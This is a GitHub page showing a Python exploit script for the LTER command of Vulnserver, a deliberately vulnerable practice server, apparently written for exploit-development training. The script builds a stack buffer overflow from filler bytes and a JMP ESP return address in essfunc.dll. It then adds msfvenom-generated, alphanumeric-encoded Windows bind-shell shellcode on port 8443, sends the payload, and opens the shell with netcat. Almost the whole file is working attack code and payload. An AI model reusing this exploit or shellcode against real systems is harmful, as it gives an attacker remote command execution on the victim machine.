-
Notifications
You must be signed in to change notification settings - Fork 0
/
vulnserver-LTER-bind.py
112 lines (102 loc) · 4.96 KB
/
vulnserver-LTER-bind.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/usr/bin/env python
import socket
import sys
import time
import telnetlib
import os
from struct import pack
def sendPayload(host, port, payload):
try:
# Sending connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send('')
data = s.recv(4096)
print(data)
s.send(payload)
s.close()
except:
print "final length: {length}".format(length = len(payload))
sys.exit-1()
def main():
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f python -v bindShell -b '\x00' -e x86/alpha_mixed LPORT=8443 BufferRegister=ESP
# Payload size: 710 bytes
# Final size of python file: 3816 bytes
bindShell = ""
bindShell += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
bindShell += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
bindShell += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
bindShell += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
bindShell += "\x42\x75\x4a\x49\x69\x6c\x7a\x48\x4e\x62\x35\x50"
bindShell += "\x65\x50\x77\x70\x75\x30\x4b\x39\x7a\x45\x36\x51"
bindShell += "\x6f\x30\x71\x74\x4e\x6b\x36\x30\x34\x70\x4e\x6b"
bindShell += "\x31\x42\x36\x6c\x6c\x4b\x43\x62\x47\x64\x6c\x4b"
bindShell += "\x61\x62\x46\x48\x56\x6f\x6f\x47\x32\x6a\x46\x46"
bindShell += "\x46\x51\x4b\x4f\x6e\x4c\x77\x4c\x51\x71\x31\x6c"
bindShell += "\x63\x32\x76\x4c\x65\x70\x6b\x71\x68\x4f\x44\x4d"
bindShell += "\x33\x31\x38\x47\x58\x62\x58\x72\x66\x32\x62\x77"
bindShell += "\x4e\x6b\x52\x72\x76\x70\x4c\x4b\x52\x6a\x55\x6c"
bindShell += "\x6c\x4b\x30\x4c\x72\x31\x73\x48\x58\x63\x43\x78"
bindShell += "\x45\x51\x78\x51\x36\x31\x4c\x4b\x42\x79\x37\x50"
bindShell += "\x75\x51\x79\x43\x6c\x4b\x32\x69\x36\x78\x4d\x33"
bindShell += "\x66\x5a\x63\x79\x4c\x4b\x54\x74\x6c\x4b\x33\x31"
bindShell += "\x39\x46\x74\x71\x59\x6f\x4c\x6c\x6b\x71\x48\x4f"
bindShell += "\x36\x6d\x76\x61\x59\x57\x54\x78\x39\x70\x73\x45"
bindShell += "\x4a\x56\x66\x63\x73\x4d\x58\x78\x47\x4b\x71\x6d"
bindShell += "\x47\x54\x30\x75\x5a\x44\x43\x68\x6e\x6b\x66\x38"
bindShell += "\x36\x44\x53\x31\x6a\x73\x65\x36\x4e\x6b\x56\x6c"
bindShell += "\x30\x4b\x6c\x4b\x43\x68\x65\x4c\x76\x61\x38\x53"
bindShell += "\x6c\x4b\x34\x44\x6c\x4b\x47\x71\x7a\x70\x4b\x39"
bindShell += "\x67\x34\x51\x34\x55\x74\x51\x4b\x61\x4b\x75\x31"
bindShell += "\x61\x49\x42\x7a\x63\x61\x4b\x4f\x6d\x30\x51\x4f"
bindShell += "\x61\x4f\x61\x4a\x6e\x6b\x75\x42\x58\x6b\x6e\x6d"
bindShell += "\x73\x6d\x62\x48\x75\x63\x70\x32\x55\x50\x75\x50"
bindShell += "\x43\x58\x44\x37\x61\x63\x37\x42\x43\x6f\x76\x34"
bindShell += "\x32\x48\x72\x6c\x61\x67\x76\x46\x76\x67\x4b\x4f"
bindShell += "\x68\x55\x4e\x58\x7a\x30\x47\x71\x67\x70\x35\x50"
bindShell += "\x46\x49\x6f\x34\x43\x64\x36\x30\x42\x48\x66\x49"
bindShell += "\x4b\x30\x50\x6b\x77\x70\x79\x6f\x49\x45\x30\x6a"
bindShell += "\x77\x78\x62\x79\x36\x30\x68\x62\x59\x6d\x71\x50"
bindShell += "\x52\x70\x73\x70\x76\x30\x53\x58\x79\x7a\x46\x6f"
bindShell += "\x49\x4f\x49\x70\x69\x6f\x4e\x35\x6e\x77\x32\x48"
bindShell += "\x55\x52\x45\x50\x65\x70\x49\x6b\x4f\x79\x59\x76"
bindShell += "\x61\x7a\x62\x30\x71\x46\x50\x57\x50\x68\x4a\x62"
bindShell += "\x6b\x6b\x35\x67\x33\x57\x39\x6f\x38\x55\x72\x77"
bindShell += "\x50\x68\x58\x37\x49\x79\x77\x48\x39\x6f\x6b\x4f"
bindShell += "\x7a\x75\x73\x67\x71\x78\x70\x74\x5a\x4c\x45\x6b"
bindShell += "\x79\x71\x39\x6f\x58\x55\x52\x77\x4c\x57\x73\x58"
bindShell += "\x30\x75\x50\x6e\x50\x4d\x30\x61\x6b\x4f\x6e\x35"
bindShell += "\x73\x58\x63\x53\x70\x6d\x62\x44\x37\x70\x6e\x69"
bindShell += "\x49\x73\x70\x57\x70\x57\x53\x67\x56\x51\x5a\x56"
bindShell += "\x62\x4a\x75\x42\x63\x69\x52\x76\x58\x62\x4b\x4d"
bindShell += "\x51\x76\x4b\x77\x57\x34\x34\x64\x75\x6c\x66\x61"
bindShell += "\x43\x31\x4e\x6d\x30\x44\x67\x54\x72\x30\x6a\x66"
bindShell += "\x37\x70\x52\x64\x73\x64\x32\x70\x71\x46\x61\x46"
bindShell += "\x43\x66\x42\x66\x70\x56\x62\x6e\x32\x76\x51\x46"
bindShell += "\x52\x73\x70\x56\x45\x38\x54\x39\x38\x4c\x55\x6f"
bindShell += "\x4c\x46\x4b\x4f\x5a\x75\x4e\x69\x39\x70\x52\x6e"
bindShell += "\x66\x36\x50\x46\x59\x6f\x64\x70\x50\x68\x73\x38"
bindShell += "\x6b\x37\x55\x4d\x33\x50\x4b\x4f\x4b\x65\x6d\x6b"
bindShell += "\x38\x70\x4e\x55\x6c\x62\x42\x76\x70\x68\x59\x36"
bindShell += "\x6a\x35\x6d\x6d\x4d\x4d\x69\x6f\x7a\x75\x77\x4c"
bindShell += "\x55\x56\x71\x6c\x37\x7a\x4d\x50\x4b\x4b\x4d\x30"
bindShell += "\x42\x55\x63\x35\x6f\x4b\x37\x37\x32\x33\x50\x72"
bindShell += "\x50\x6f\x42\x4a\x73\x30\x31\x43\x49\x6f\x5a\x75"
bindShell += "\x41\x41"
# Target Host
host = '127.0.0.1'
port = 9999
# Bind Shell
bport = 8443
# JMP ESP in essfunc.dll
jmpESP = pack('<i', 0x62501203)
payload = 'LTER /.:/' + 'A' * 2003 + jmpESP + bindShell + 'B' * (3000 - 2003 - 4 - len(bindShell))
print('Total payload length: {0}'.format(len(payload)))
print('\r\n\r\n[+] Sending payload')
sendPayload(host, port, payload)
print('[+] Connecting to bind shell')
time.sleep(1)
os.system('nc {0} {1}'.format(host, bport))
print('[+] Connection closed.')
if __name__ == "__main__":
sys.exit(main())